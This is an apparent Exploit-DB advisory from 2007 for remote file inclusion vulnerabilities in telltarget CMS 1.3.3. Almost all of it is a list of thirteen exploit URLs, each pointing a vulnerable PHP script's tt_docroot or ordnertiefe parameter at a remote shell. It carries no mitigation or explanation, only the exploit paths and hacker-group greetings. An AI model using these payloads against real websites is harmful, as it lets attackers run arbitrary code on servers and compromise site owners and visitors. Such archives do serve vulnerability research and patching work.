telltarget 1.3.3 - 'tt_docroot' Remote File Inclusion

EDB-ID:

3885

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-05-09

# telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilitie
# D.Script: http://www.telltargetcms.de/download/telltarget_1.3.3.zip 
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/phplib/site_conf.php?ordnertiefe=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
# Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell
# Greetz To: Tryag-Team ....&&&

# milw0rm.com [2007-05-09]